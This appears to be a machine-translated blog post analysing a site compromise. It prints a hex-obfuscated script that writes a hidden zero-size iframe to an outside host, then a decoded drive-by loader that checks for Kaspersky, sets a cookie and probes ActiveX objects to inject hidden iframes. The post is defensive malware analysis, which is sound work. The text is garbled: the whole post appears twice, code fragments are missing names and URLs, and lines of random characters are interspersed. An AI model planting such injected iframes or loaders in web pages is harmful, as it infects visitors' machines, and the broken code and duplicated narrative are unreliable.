The hang is quite hidden, and the following code is added to the middle of /:
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
That's it:
window["document"]["writeln"]('<iframe height=0 width=0 src="http:///page/add_644455.htm"></iframe>');
But only this js will not make that iframe effective, what makes it effective is the code that calls this js to display flash:
<script language="javascript" type="text/javascript">
writeflashhtml("_swf=/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>
With this, the iframe takes effect; after some call and decryption, it is:
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=(65+i);="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\::/images/";="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\::/images/";if(==41||==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";(()+24*60*60*1000);var aaffdasfascookie=new String();var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";="Cookie1=POPWINDOS;expires="+();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(().indexOf("msie 7")==-1)('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(""))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}}
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
I picked a few decrypted:/
Get another link from this file:/
Something familiar...
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
From the above, we can see that the problem is that, so all pages that use this js to flash are poisonous! I randomly searched for a few pages and found that they were all poisonous. This time, I was hanged on a large scale. Comrades were careful.
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
Please keep the statement when reprinting! (/dikex/blog/item/)
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
That's it:
window["document"]["writeln"]('<iframe height=0 width=0 src="http:///page/add_644455.htm"></iframe>');
But only this js will not make that iframe effective, what makes it effective is the code that calls this js to display flash:
<script language="javascript" type="text/javascript">
writeflashhtml("_swf=/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");
</script>
With this, the iframe takes effect; after some call and decryption, it is:
function bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=(65+i);="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\::/images/";="mk:@MSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\::/images/";if(==41||==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";(()+24*60*60*1000);var aaffdasfascookie=new String();var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";="Cookie1=POPWINDOS;expires="+();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(().indexOf("msie 7")==-1)('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(""))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}try{if(new ActiveXObject(".1"))('<iframe style=display:none src="/"></iframe>')}catch(e){}}
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
I picked a few decrypted:/
Get another link from this file:/
Something familiar...
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
From the above, we can see that the problem is that, so all pages that use this js to flash are poisonous! I randomly searched for a few pages and found that they were all poisonous. This time, I was hanged on a large scale. Comrades were careful.
K$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE
Please keep the statement when reprinting! (/dikex/blog/item/)